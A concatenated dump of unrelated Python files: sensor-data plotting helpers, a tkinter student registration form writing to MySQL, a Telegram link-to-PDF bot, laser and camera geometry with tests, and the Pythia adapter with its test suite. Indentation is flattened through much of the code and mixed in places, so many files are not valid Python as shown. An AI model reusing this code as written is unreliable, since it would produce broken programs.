base = base,
freq = freq)
jitter_factor = 0.05 # This shifts the points a bit to prevent overlap
jitter = i * jitter_factor
ax.scatter(timerange[:len(is_data)],
is_data + jitter,
label=source_id.replace("_", " "),
alpha=1,
s = 4,
)
#breakpoint()
ax.legend(loc="center right", ncol=2)
# ax.set_ylim((-0.1, 1.1))
ax.set_xlim((start_date, end_date))
ax.set_ylabel(f"Data present in {freq} intervals?")
ax.set_yticks([0,1], )
ax.set_yticklabels(["False", "True"])
ax.set_ylim([-0.2, 1.5])
ax.set_title(f"{loc_id}, sensor data on {base} database")
fig.autofmt_xdate()
return fig
def plot_clip(loc_id, start, end, base, **kwargs):
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
try:
payload = list()
for collection in DATA_COLLECTIONS:
payload += ac.download(
loc_id,
{"$regex": "_accel_"},
start,
end + datetime.timedelta(hours=2),
base=base,
collection=collection)
for placement in ["bed",
"belt",
"bracelet_right",
"bracelet_left",
"ankle",
"bracelet_right "]:
for suffix in ["egw", "amb", "app"]:
founds = [item for item in payload if item["SourceId"] == f"sens_{placement}_accel_{suffix}"]
if founds == []:
continue
t, m = ac.magnitude_response_to_data(founds)
ax.plot(
pd.to_datetime(t, unit="ms"),
m,
label = f"{placement} {suffix}",
alpha = 0.8)
ax.legend()
except Exception as e:
ax.text(start, 1, f"Accelerometry querying raised {e}")
ax.text(start, 0.7, f"Got exception: {e}")
ax.set_ylim((0, 1.5))
ax.set_xlim((start, end))
ax.set_title(f"{loc_id} clip sensor data, {base} database")
ax.set_ylabel("Magnitude (g)")
ax.set_xlabel("Datetime (UTC)")
fig.autofmt_xdate()
return fig
def plot_clip_mobility(loc_id, start, end, base, **kwargs):
fig, [ax, ax2] = plt.subplots(figsize=(8, 5), dpi=100, nrows=2, sharex=True)
    # initialise these before the try blocks so the except handlers below can safely
    # check len(t) / len(ts) even if an exception is raised before they are assigned
    t = []
    ts = []
    try:
        payload = list()
for collection in DATA_COLLECTIONS:
payload += ac.download(
loc_id,
{"$regex": "_accel_"},
start,
end + datetime.timedelta(hours=2, minutes=5),
base=base,
collection=collection)
for placement in ["belt",
"bracelet_right",
"bracelet_left",
"ankle",
"bracelet_right "]:
for suffix in ["egw", "amb", "app"]:
founds = [item for item in payload if item["SourceId"] == f"sens_{placement}_accel_{suffix}"]
if founds == []:
continue
t, m = ac.magnitude_response_to_data(founds)
ax.plot(
pd.to_datetime(t, unit="ms"),
m,
label = f"{placement} {suffix}",
alpha = 0.8)
ax.legend()
ax.set_xlim((start, end))
except Exception as e:
if len(t) == 0:
ax.text(start, 1, f"No raw magnitude data to plot")
ax.set_title("No raw magnitude data to plot")
else:
ax.text(start, 1, f"Accelerometry querying raised {e}")
ax.text(start, 0.7, f"Got exception: {e}")
ax.set_ylim((0, 1.5))
ax.set_title(f"{loc_id} clip sensor data, {base} database\nmobility instructed")
ax.set_ylabel("Magnitude (g)")
ax.set_xlabel("Datetime (UTC)")
ax2.set_ylabel("feat_mobility_activity")
try:
payload = ac.download_coaching_walking(loc_id,
start, end + datetime.timedelta(hours=2), base = base
)
ts = [item["Data"]["Timestamp"] for item in payload]
states = [item["Data"]["Measurements"][0] for item in payload]
ax2.scatter(pd.to_datetime(ts, unit="ms",),
states,
s=4)
ax2.set_xlabel(f"UTC datetime")
except Exception as e:
#breakpoint()
if len(ts) == 0:
ax2.set_xlabel(f"No walking classifier data found!")
ax2.set_title(f"No data found.")
else:
ax2.set_xlabel(f"Walking classifier states querying raised {e}")
ax2.set_title(f"Got exception: {e}")
fig.autofmt_xdate()
return fig
def plot_cooking(loc_id, start, end, base, **kwargs):
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
#import pdb; pdb.set_trace()
def _parse_cooking_coaching(rezlist: list):
"""Returns timestamps, coaching actions and feat_activity_cooking_weekly_average
from input that should be a list of database items.
Rezlist = download_coaching_cooking(loc_id, start, end)"""
timestamps = [item.get("Timestamp") for item in rezlist]
coaching_actions = [item.get("CoachingAction") for item in rezlist]
completions = [item.get("Completion") for item in rezlist]
facwa = [item.get("Parameters").get("feat_activity_cooking_weekly_average") for item in rezlist]
#completions = [item if item else np.nan for item in completions]
        def assign_color(label):
            # completion 0 is a valid value ("done"), so only treat a missing value as black
            if label is None:
                return "k"
elif label == 2:
return "r"
elif label == 1:
return "tab:orange"
elif label == 0:
return "green"
else:
raise ValueError(f"Got a weird completion: {label}")
colors = [assign_color(item) for item in completions]
return pd.to_datetime(timestamps, unit="s"), coaching_actions, facwa, completions, colors
def _parse_cooking_data(data_list: list):
datetimes = pd.to_datetime([item.get("Data").get('Timestamp') for item in data_list], unit="ms")
try:
values = [item.get("Data").get('Measurements')[0].get("dP") for item in data_list]
except:
values = [item.get("Data").get('Measurements')[0] for item in data_list]
return datetimes, values
extended_start = start - datetime.timedelta(days=1)
extended_end = end + datetime.timedelta(days=1)
ax.set_xlim((start, end))
# Deal with sensor data
cooking_data_dict = ac.download_cooking_data(loc_id, start, end, base)
for feature, data in cooking_data_dict.items():
datetimes, values = _parse_cooking_data(data)
if not values:
continue
ax.scatter(datetimes, values, label=feature)
# Deal with coachings:
rezlist = ac.download_coaching_cooking(loc_id, start, end, base=base)
ts, cs, facwas, completions, colors = _parse_cooking_coaching(rezlist)
del rezlist
ax2 = ax.twinx()
ax2.step(ts, facwas, label="cooking\nweekly average")
for x, y, s, c, completion in zip(ts, facwas, cs, colors, completions):
s = s.replace("_", " ")
if s.startswith("negative"):
s = "negative msg"
if s.startswith("positive"):
s = "positive msg"
if completion is not None:
if completion == 2:
s += " (declined)"
elif completion == 1:
s += " (can not)"
elif completion == 0:
s += " (done)"
ax2.text(x, y, s, color=c, rotation=60, horizontalalignment="center", verticalalignment="center")
# for x, y, s in zip(ts, facwas, completions):
# if not s:
# continue
# if s == 0:
# s = "Done"
# if s == 1:
# s = "Can not"
# if s == 2:
# s = "Declined"
# ax2.text(x, y, f"Completion: {s}", color="red", rotation=60, horizontalalignment="center", verticalalignment="bottom")
lines1, labels1 = ax.get_legend_handles_labels()
lines2, labels2 = ax2.get_legend_handles_labels()
ax.legend(lines1+lines2, labels1+labels2, ncol=2)
ax.set_ylabel("Energy (W)")
ax2.set_ylabel("Cooking weekly average")
ax.set_title(f"{loc_id}, cooking, {base} base")
ax.set_xlabel("Datetime (UTC)")
fig.autofmt_xdate()
return fig
def plot_sleep_coaching(loc_id, start, end, base="prod"):
fig, ax = plt.subplots(figsize = (10, 5))
ax.set_title(f"Sleep coaching evaluation,\n{loc_id}, {base} database")
datadict = ac.process_data(loc_id, start, end, base=base)
eff_key = 'fuse_sleep_efficiency'
coach_key = 'coach_sleep_quality'
# Plot fuse_sleep_efficiency:
timestamps = datadict[eff_key]["timestamps_ms"]
measurements = datadict[eff_key]["values"]
timestamps = pd.to_datetime(timestamps, unit="ms", utc=True)
#breakpoint()
assert len(timestamps) == len(measurements), "Timestamps and values have different length"
ax.scatter(timestamps, measurements, label=eff_key)
ax.plot(timestamps, measurements, label=eff_key)
ax.set_ylabel(eff_key)
#breakpoint()
ax.set_ylim((ax.get_ylim()[0], ax.get_ylim()[1]*1.3))
# Plot coachings:
timestamps = datadict[coach_key]["timestamps_ms"]
measurements = datadict[coach_key]["values"]
timestamps = pd.to_datetime(timestamps, unit="ms", utc=True)
#breakpoint()
def assign_colour(s):
if s == "no_action":
return "k"
if "doctor" in s:
return "r"
if "go_to_bed" in s:
return "b"
if "get_up" in s:
return "g"
else:
return "orange"
for t, c in zip(timestamps, measurements):
try:
ax.text(t, 1, c.replace("_", " "), rotation=45, color=assign_colour(c), va="top")
except:
pass
fig.autofmt_xdate()
#plt.tight_layout()
return fig
``` |
{
"source": "5sai/Registration-form",
"score": 4
} |
#### File: 5sai/Registration-form/College Submission Form.py
```python
from tkinter import *
import mysql.connector as mysql
'''creating a root'''
root=Tk()
root.geometry("500x500")
root.title("college student forum")
def Submit():
fname=e_1.get()
lname=e_2.get()
sname=e_3.get()
gender=e_4.get()
email=e_5.get()
Phone=e_6.get()
address=e_7.get()
if(fname=="" or lname=="" or sname=="" or gender=="" or email=="" or Phone=="" or address==""):
print("fill form")
else:
conn=mysql.connect(host="localhost",user="root",password="",database="Registration form")
cursor=conn.cursor()
        # use a parameterised query so user input cannot break (or inject into) the SQL
        cursor.execute(
            "insert into student values(%s, %s, %s, %s, %s, %s, %s)",
            (fname, lname, sname, gender, email, Phone, address)
        )
        conn.commit()
        conn.close()
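        # Assumed MySQL schema behind the insert above (hypothetical, not part of this file):
        #   CREATE TABLE student (fname VARCHAR(50), lname VARCHAR(50), sname VARCHAR(50),
        #                         gender VARCHAR(10), email VARCHAR(100), phone VARCHAR(15),
        #                         address VARCHAR(255));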
registration=Label(root,text="Registration form",width="25",font="20",bg="yellow",fg="red")
registration.place(x=160,y=30)
Fname=Label(root,text="First name :",width="20",font="20",fg="red")
Fname.place(x=50,y=100)
Lname=Label(root,text="Last name :",width="20",font="20",fg="red")
Lname.place(x=50,y=130)
Sname=Label(root,text="Sur name :",width="20",font="20",fg="red")
Sname.place(x=50,y=160)
Gender=Label(root,text="Gender :",width="20",font="20",fg="red")
Gender.place(x=50,y=190)
Email=Label(root,text="Email :",width="20",font="20",fg="red")
Email.place(x=50,y=220)
Phone=Label(root,text="Phone number :",width="20",font="20",fg="red")
Phone.place(x=50,y=250)
Address=Label(root,text="Address",width="20",font="20",fg="red")
Address.place(x=50,y=280)
e_1=Entry(root,width="25")
e_1.place(x=280,y=105)
e_2=Entry(root,width="25")
e_2.place(x=280,y=135)
e_3=Entry(root,width="25")
e_3.place(x=280,y=165)
e_4=Entry(root,width="25")
e_4.place(x=280,y=195)
e_5=Entry(root,width="25")
e_5.place(x=280,y=225)
e_6=Entry(root,width="25")
e_6.place(x=280,y=255)
e_7=Entry(root,width="25")
e_7.place(x=280,y=285)
Button(root, text="Submit",width="25",font="20",bg="yellow",fg="red",command=Submit).place(x=160,y=405)
root.mainloop()
``` |
{
"source": "5samagi/LinkpdfBot",
"score": 2
} |
#### File: 5samagi/LinkpdfBot/bot.py
```python
import os
import requests
import weasyprint
import urllib.request
from presets import Presets
from bs4 import BeautifulSoup
from pyrogram import Client, filters
from pyrogram.types import Message, InlineKeyboardMarkup, InlineKeyboardButton, CallbackQuery
if bool(os.environ.get("ENV", False)):
from sample_config import Config
else:
from config import Config
# -------------------------- Bot Configuration ---------------------------------------------- #
Bot = Client(
"link2PdfBot",
bot_token=Config.TG_BOT_TOKEN,
api_id=Config.APP_ID,
api_hash=Config.API_HASH,
)
# ------------------------------ Start Command ---------------------------------------------- #
@Bot.on_message(filters.private & filters.command(["start", "help"]))
async def start_bot(self, m: Message):
await m.reply_text(
Presets.START_TXT.format(m.from_user.first_name),
reply_to_message_id=m.message_id,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[InlineKeyboardButton("🛡 Support Channel", url="t.me/UpdateBots1"),
InlineKeyboardButton("🎯 Source", url="https://github.com/INDOHACKER-XODE")]
]
)
)
# -------------------------------- Main execution fn --------------------------------------- #
@Bot.on_message(filters.private & filters.text)
async def link_extract(self, m: Message):
if not m.text.startswith("http"):
await m.reply_text(
Presets.INVALID_LINK_TXT,
reply_to_message_id=m.message_id,
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton("Close", callback_data="close_btn")]]
)
)
return
file_name = str()
#
thumb_path = os.path.join(os.getcwd(), "img")
if not os.path.isdir(thumb_path):
os.makedirs(thumb_path)
urllib.request.urlretrieve(Presets.THUMB_URL, os.path.join(thumb_path, "thumbnail.png"))
else:
pass
#
thumbnail = os.path.join(os.getcwd(), "img", "thumbnail.png")
#
await self.send_chat_action(m.chat.id, "typing")
msg = await m.reply_text(Presets.PROCESS_TXT, reply_to_message_id=m.message_id)
try:
req = requests.get(m.text)
# using the BeautifulSoup module
soup = BeautifulSoup(req.text, 'html.parser')
# extracting the title frm the link
for title in soup.find_all('title'):
file_name = str(title.get_text()) + '.pdf'
# Creating the pdf file
weasyprint.HTML(m.text).write_pdf(file_name)
except Exception:
await msg.edit_text(
Presets.ERROR_TXT,
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton("Close", callback_data="close_btn")]]
)
)
return
try:
await msg.edit(Presets.UPLOAD_TXT)
except Exception:
pass
await self.send_chat_action(m.chat.id, "upload_document")
await m.reply_document(
document=file_name,
caption=Presets.CAPTION_TXT.format(file_name),
thumb=thumbnail
)
print(
'@' + m.from_user.username if m.from_user.username else m.from_user.first_name,
"has downloaded the file",
file_name
)
try:
os.remove(file_name)
except Exception:
pass
await msg.delete()
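# The core conversion performed by the handler above, outside the bot context
# (a minimal sketch; "https://example.com" is a placeholder URL):
#
#   page = requests.get("https://example.com")
#   title = BeautifulSoup(page.text, "html.parser").find("title").get_text()
#   weasyprint.HTML("https://example.com").write_pdf(title + ".pdf")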
# --------------------------------- Close Button Call Back --------------------------------- #
@Bot.on_callback_query(filters.regex(r'^close_btn$'))
async def close_button(self, cb: CallbackQuery):
await self.delete_messages(
cb.message.chat.id,
[cb.message.reply_to_message.message_id, cb.message.message_id]
)
print(f"\n\nBot Started Successfully !\n\n")
Bot.run()
``` |
{
"source": "5sam/ScanUS",
"score": 3
} |
#### File: 5sam/ScanUS/laser.py
```python
import math
import numpy as np
from transform import Matrix, mult
TOWER_POS = [-110.46551, 563.0474, 79]
TOWER_ANGLES = [0, 0, (180 + 11.1) * 2 * math.pi / 360]
WRIST_POS = [0, 0, 0]
WRIST_ANGLES = [0, 0, 0]
LASER_POS = [0, 1, 0]
SCREW_HEIGHT_PER_TURN = .15
# Matrix from top of tower center of laser
def get_wrist_matrix(angle_wrist=0):
fixed_matrix = Matrix(pos=WRIST_POS, angles=WRIST_ANGLES)
variable_matrix = Matrix(angles=[angle_wrist, 0, 0])
return mult([fixed_matrix, variable_matrix])
# Convert rotation of the drive screw (rad) to linear travel (height) in mm
def angle_to_dist(angle_tower):
num_turn = angle_tower / (2 * math.pi)
dist = num_turn * SCREW_HEIGHT_PER_TURN
return dist
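# e.g. one full turn (angle_tower = 2*pi) gives 1 * SCREW_HEIGHT_PER_TURN = 0.15 mm of travel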
# Matrix from base of tower to top of moving part(top of tower)
def get_tower_matrix(angle_tower=0):
height = angle_to_dist(angle_tower)
fixed_matrix = Matrix(pos=TOWER_POS, angles=TOWER_ANGLES)
variable_matrix = Matrix(pos=[0, 0, height])
return mult([fixed_matrix, variable_matrix])
# gets line (matrix) of line in world
def get_laser_line_in_world(angle_table=0, angle_tower=0, angle_wrist=0):
floor_matrix = Matrix(angles=[0, 0, angle_table])
wrist_matrix = get_wrist_matrix(angle_wrist)
tower_matrix = get_tower_matrix(angle_tower)
laser_matrix = mult([floor_matrix, tower_matrix, wrist_matrix])
return laser_matrix
# transform line(matrix) to line(point,vector)
def get_laser_point_vector_in_world(angle_table=0, angle_tower=0, angle_wrist=0):
laser_matrix_world = get_laser_line_in_world(angle_table, angle_tower, angle_wrist)
point = laser_matrix_world.get_pos()
unit_vector_matrix = Matrix(pos=[0, 1, 0])
point_vector_direction = mult([laser_matrix_world, unit_vector_matrix])
vector = point_vector_direction.get_pos() - point
return point, vector
```
#### File: 5sam/ScanUS/test_camera.py
```python
import unittest
import numpy as np
import camera
import cv2
from math import pi
import transform
test_image_good = r'D:\_Udes\S4\Projet\ScanUS\Photos_boite\photo_0.png'
test_image_bad = r'D:\_Udes\S4\Projet\ScanUS\imagetestjuan.jpg'
class TestCamera(unittest.TestCase):
def test_find_red_dot(self):
frame = []
np.testing.assert_allclose(camera.find_red_dot(frame), [0, 0, True])
frame = cv2.imread(test_image_good)
## actual value obtained with paint
np.testing.assert_allclose(camera.find_red_dot(frame), [462, 637, False], atol=.5)
frame = cv2.imread(test_image_bad)
## actual value obtained with paint
np.testing.assert_allclose(camera.find_red_dot(frame), [0, 0, True])
def test_get_camera_matrix(self):
CAM_POS = [10, -1, 32]
CAM_ANGLES = [0, 0, 0]
TABLE_ANGLE = -pi/2
EXPECTED_POS = [-1, -10, 32]
np.testing.assert_allclose(
camera.get_camera_ext_matrix(angle_table=TABLE_ANGLE, cam_pos=CAM_POS, cam_angles=CAM_ANGLES).get_pos(),
EXPECTED_POS)
EXPECTED_ANGLE_MATRIX = [[0, 1, 0],
[-1, 0, 0],
[0, 0, 1]]
np.testing.assert_allclose(
camera.get_camera_ext_matrix(angle_table=TABLE_ANGLE, cam_pos=CAM_POS,
cam_angles=CAM_ANGLES).get_angle_matrix(),
EXPECTED_ANGLE_MATRIX, atol=0.01)
``` |
{
"source": "5sigmapoint2/pythiaparser",
"score": 2
} |
#### File: pythiaparser/pythia/Adapter.py
```python
import importlib
import sys
import traceback
from antlr4.CommonTokenStream import CommonTokenStream
from antlr4.InputStream import InputStream
from antlr4.tree.Tree import ParseTreeWalker
from pythia.antlr4.PythiaFunctionCallLexer import PythiaFunctionCallLexer
from pythia.antlr4.PythiaFunctionCallListener import PythiaFunctionCallListener
from pythia.antlr4.PythiaFunctionCallParser import PythiaFunctionCallParser
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
class FunctionCall(PythiaFunctionCallListener):
def __init__(self):
self.module_name = ""
self.function_name = ""
self.function_fqn = ""
self.args = ()
self.mem = {}
def exitCall(self, ctx: PythiaFunctionCallParser.CallContext):
self.args = tuple(self.mem[arg_ctx] for arg_ctx in ctx.argument())
def exitFull_function_name(self,
ctx: PythiaFunctionCallParser.Full_function_nameContext):
self.function_fqn = ctx.getText().strip('\'')
self.module_name, self.function_name = self.function_fqn.rsplit('.', 1)
def exitArgument(self, ctx: PythiaFunctionCallParser.ArgumentContext):
self.mem[ctx] = self.mem[ctx.value()]
def exitArrayOfValues(self,
ctx: PythiaFunctionCallParser.ArrayOfValuesContext):
self.mem[ctx] = [self.mem[value_ctx] for value_ctx in ctx.value()]
def exitEmptyArray(self, ctx: PythiaFunctionCallParser.EmptyArrayContext):
self.mem[ctx] = []
def exitArrayValue(self, ctx: PythiaFunctionCallParser.ArrayValueContext):
self.mem[ctx] = self.mem[ctx.array()]
def exitString(self, ctx: PythiaFunctionCallParser.StringContext):
self.mem[ctx] = ctx.getText().strip('\'')
def exitInteger(self, ctx: PythiaFunctionCallParser.IntegerContext):
self.mem[ctx] = int(ctx.getText())
def exitFloat(self, ctx: PythiaFunctionCallParser.FloatContext):
self.mem[ctx] = float(ctx.getText())
# ----------------------------------------------------------------------------
# The Extension entry point in python
# ----------------------------------------------------------------------------
def python_adapter(input_string):
try:
if input_string == "":
return format_error_string("Input string cannot be empty")
call = parse_input(input_string)
return_value = python_proxy(
call.module_name,
call.function_name,
call.function_fqn,
*call.args)
return format_response_string(return_value)
except:
return format_error_string(traceback.format_exc())
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
def parse_input(input_string):
input = InputStream(input_string)
function_call = FunctionCall()
walker = ParseTreeWalker()
walker.walk(
function_call,
PythiaFunctionCallParser(
CommonTokenStream(
PythiaFunctionCallLexer(input))).call())
return function_call
# ----------------------------------------------------------------------------
# Performs the call
# ----------------------------------------------------------------------------
def python_proxy(module_name, function_name, function_fqn, *args):
global FUNCTION_CACHE
try:
function = FUNCTION_CACHE[function_fqn]
except KeyError: # Function not cached, load the module
try:
module = sys.modules[module_name]
except KeyError:
# Module not imported yet, import it
module = importlib.import_module(module_name)
# Get the requested function
function = getattr(module, function_name)
FUNCTION_CACHE[function_fqn] = function
# Call the requested function with the given arguments
return function(*args)
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
def format_error_string(stacktrace_str):
"""Return a formatted exception."""
return '["e", "{}"]'.format(stacktrace_str.replace('"', '""'))
# ----------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------
def format_response_string(return_value):
"""Return a formatted response.
For now, it's just doing a dumb str() which may or may not work depending
on the arguments passed. This should work as long as none of the arguments
contain double quotes (").
"""
return str(["r", return_value])
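# e.g. format_response_string([1, 'a']) returns "['r', [1, 'a']]" -- note the single
# quotes, since str() is used rather than a JSON serializer (see the docstring above).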
###############################################################################
# Below are testing functions which exist solely to check if everything is
# working correctly.
# If someone wants to check if their python module works, they should Call
# Pythia.test() and later Pythia.ping() to make sure they understand the syntax
###############################################################################
def test(*args):
return "OK"
def ping(*args):
return list(args)
FUNCTION_CACHE = {
'Pythia.ping': ping,
'Pythia.test': test,
}
# Somehow Visual Studio cannot load this if there is a newline at the
# end of the file
``` |
{
"source": "5sigmapoint2/Pythia",
"score": 2
} |
#### File: adapter_import_test/module_one/file_one.py
```python
print('Interpreting module_one.file_one.py')
def fun():
print('module_one::file_one::fun()')
return 'module_one::file_one::fun()'
```
#### File: adapter_import_test/module_two/file_two.py
```python
print('Interpreting module_two.file_two.py')
def fun():
print('module_two::file_two::fun()')
return 'module_two::file_two::fun()'
```
#### File: Pythia/python/examples.py
```python
def test(*args):
"""Always return the string "OK"."""
return "OK"
def ping(*args):
"""Return the list of arguments passed to the function.
The function name is omitted in the list returned.
"""
return list(args)
def get_multiples(multiplier, count):
"""Return [0, 1*multiplier, 2*multiplier, ...]."""
return [i * multiplier for i in range(count)]
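# e.g. get_multiples(3, 4) -> [0, 3, 6, 9]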
```
#### File: Pythia/tests/tests.py
```python
import os
import platform
import shutil
import subprocess
import unittest
def setUpModule(): # noqa
Base.ensure_no_tester()
tester_path = os.path.join(Base.this_dir, '..', '@Pythia', Base.pythia_tester())
shutil.copy2(tester_path, Base.this_dir)
def tearDownModule(): # noqa
Base.ensure_no_tester()
class Base(unittest.TestCase):
this_dir = os.path.abspath(os.path.dirname(__file__))
pythia_path = os.path.join('..', '@Pythia')
@staticmethod
def pythia_tester():
name = 'PythiaTester'
if platform.architecture()[0] == '64bit':
name += '_x64'
if platform.system() == 'Windows':
name += '.exe'
return name
def _call_tester(self, *args, loaded_pbos=None, timeout=10):
if not loaded_pbos:
loaded_pbos = []
cmd = [os.path.abspath(os.path.join(self.this_dir, self.pythia_tester()))]
for pbo in loaded_pbos:
cmd.extend(['-o', pbo])
cmd += args
process = subprocess.run(cmd, capture_output=True, timeout=timeout, text=True, cwd=self.this_dir)
return process.stdout, process.stderr, process.returncode
@staticmethod
def create_request(function, args):
return f'["{function}", {args}]'
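    # e.g. create_request('pythia.ping', [1, 2]) -> '["pythia.ping", [1, 2]]'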
@staticmethod
def ensure_no_tester():
try:
os.remove(os.path.join(Base.this_dir, Base.pythia_tester()))
except FileNotFoundError:
pass
def setUp(self):
self.maxDiff = 3000
class RequirementsInstaller(Base):
def _install_requirements(self, requirements_file_path):
requirements_installer_path = os.path.join(self.this_dir, self.pythia_path, 'install_requirements')
if platform.system() == 'Windows':
requirements_installer_path += '.bat'
else:
requirements_installer_path += '.sh'
if platform.system() == 'Windows':
cmd = ['cmd', '/c', requirements_installer_path, 'nopause', requirements_file_path]
else:
cmd = ['/bin/bash', requirements_installer_path, requirements_file_path]
process = subprocess.run(cmd, capture_output=True, timeout=120, text=True, cwd=self.this_dir)
try:
self.assertEqual(process.returncode, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(process.stdout)
print(process.stderr)
raise
class TestBasicPing(Base):
def test_sanity_cant_open_with_local_dir(self):
request = self.create_request('pythia.ping', [1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
output, err, code = self._call_tester('.', request)
try:
self.assertNotEqual(code, 0, 'Calling the tester with the wrong path should fail')
except AssertionError:
print(output)
raise
self.assertIn('Could not open', output)
def test_sanity_can_open_with_pythia_dir(self):
request = self.create_request('pythia.ping', [1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
output, err, code = self._call_tester(self.pythia_path, request)
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3,4,5,6,7,8,9,0]]')
class TestMods(Base):
def test_basic_loaded_mod(self):
request = self.create_request('basic.function', [1, 2, 3])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@BasicMod', 'addons', 'basic_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3]]')
def test_renamed_loaded_mod(self):
request = self.create_request('renamed.function', [1, 2, 3, 4])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@RenamedMod', 'addons', 'renamed_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3,4]]')
def test_special_chars_loaded_mod(self):
request = self.create_request('zolw.function', [1, 2, 3, 4, 5])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@ŻółwMod', 'addons', 'żółw_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2,3,4,5]]')
class TestSpecialCharsPythia(Base):
special_chars_pythia_path = '@ŻółwPythia'
def delete_link(self):
try:
os.remove(os.path.abspath(os.path.join(self.this_dir, self.special_chars_pythia_path)))
except (FileNotFoundError, PermissionError, IsADirectoryError):
pass
# Linux symlink + Windows junction
try:
os.rmdir(os.path.abspath(os.path.join(self.this_dir, self.special_chars_pythia_path)))
except FileNotFoundError:
pass
def make_link(self, existing_directory, new_name):
if platform.system() == 'Windows':
cmd = ['cmd', '/c', 'mklink', '/J', new_name, existing_directory]
subprocess.run(cmd, check=True, cwd=self.this_dir)
else: # Linux
os.symlink(existing_directory, new_name)
def setUp(self):
super().setUp()
self.delete_link()
self.make_link(os.path.join(self.this_dir, self.pythia_path),
os.path.abspath(os.path.join(self.this_dir, self.special_chars_pythia_path)))
def tearDown(self):
super().tearDown()
self.delete_link()
def test_pythia_in_directory_with_special_chars(self):
request = self.create_request('basic.function', [1, 2])
output, err, code = self._call_tester(self.special_chars_pythia_path, request,
loaded_pbos=[os.path.join('@BasicMod', 'addons', 'basic_mod.pbo')])
try:
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
except AssertionError:
print(output)
raise
self.assertEqual(output, '["r",[1,2]]')
class TestRequirements(RequirementsInstaller):
def _uninstall_requests(self):
request = self.create_request('requirements_mod.uninstall_requests', [])
output, err, code = self._call_tester(
self.pythia_path, request, loaded_pbos=[os.path.join('@RequirementsMod', 'addons', 'requirements_mod.pbo')])
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
self.assertTrue(output == '["r",nil]' or 'Successfully uninstalled requests' in output)
def _check_if_requests_fail(self):
request = self.create_request('requirements_mod.get_requests_version', [])
output, err, code = self._call_tester(
self.pythia_path, request, loaded_pbos=[os.path.join('@RequirementsMod', 'addons', 'requirements_mod.pbo')])
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
self.assertIn('ModuleNotFoundError', output)
def _check_if_requests_installed(self):
request = self.create_request('requirements_mod.get_requests_version', [])
output, err, code = self._call_tester(
self.pythia_path, request, loaded_pbos=[os.path.join('@RequirementsMod', 'addons', 'requirements_mod.pbo')])
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
self.assertEqual(output, '["r","2.26.0"]')
def test_installing_requirements(self):
requirements_file_path = os.path.join(self.this_dir, '@RequirementsMod', 'requirements.txt')
self._uninstall_requests()
self._check_if_requests_fail()
self._install_requirements(requirements_file_path)
self._check_if_requests_installed()
class TestCython(RequirementsInstaller):
def setUp(self):
super().setUp()
self.clean_directories()
def tearDown(self):
super().tearDown()
self.clean_directories()
def clean_directories(self):
directories = [
os.path.join(self.this_dir, '@CythonMod'),
os.path.join(self.this_dir, '@CythonMod', 'cython_basic'),
os.path.join(self.this_dir, '@CythonNumpyMod'),
os.path.join(self.this_dir, '@CythonNumpyMod', 'cython_numpy_basic'),
]
for d in directories:
shutil.rmtree(os.path.join(d, 'build'), ignore_errors=True)
for f in os.listdir(d):
filename, ext = os.path.splitext(f)
if ext in ['.c', '.pyd', '.so']:
os.unlink(os.path.join(d, f))
def test_cython_mod(self):
# Install the Cython requirements to build the extension
requirements_file_path = os.path.join(self.this_dir, '@CythonMod', 'requirements.txt')
self._install_requirements(requirements_file_path)
# Note: DON'T do this normally. This is just a workaround to ensure
# that the right python interpreter is called! You're supposed to have
# a script that will probably call both pythons in sequence to build
# the extension for both 32bit and 64bit
setup_py_path = os.path.join(self.this_dir, '@CythonMod')
request = self.create_request('cython_basic.compile_python_extension_do_not_use_this_way', [setup_py_path])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonMod', 'addons', 'cython_mod.pbo')],
timeout=30)
# Mild check
self.assertIn('running build_ext', output)
self.assertNotIn('failed', output)
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
# Try calling the function
request = self.create_request('cython_basic.function', [1, 2, 3])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonMod', 'addons', 'cython_mod.pbo')])
self.assertEqual(output, '["r","Hello from cython!"]')
self.assertEqual(code, 0, 'Calling the tester with the right path should succeed')
def test_cython_numpy_mod(self):
# Install the Cython requirements to build the extension
requirements_file_path = os.path.join(self.this_dir, '@CythonNumpyMod', 'requirements.txt')
self._install_requirements(requirements_file_path)
# Note: DON'T do this normally. This is just a workaround to ensure
# that the right python interpreter is called! You're supposed to have
# a script that will probably call both pythons in sequence to build
# the extension for both 32bit and 64bit
setup_py_path = os.path.join(self.this_dir, '@CythonNumpyMod')
request = self.create_request('cython_numpy_basic.compile_python_extension_do_not_use_this_way',
[setup_py_path])
output, err, code = self._call_tester(self.pythia_path, request,
loaded_pbos=[os.path.join('@CythonNumpyMod', 'addons',
'cython_numpy_mod.pbo')],
timeout=60)
# Mild check
self.assertIn('running build_ext', output)
self.assertNotIn('failed', output)
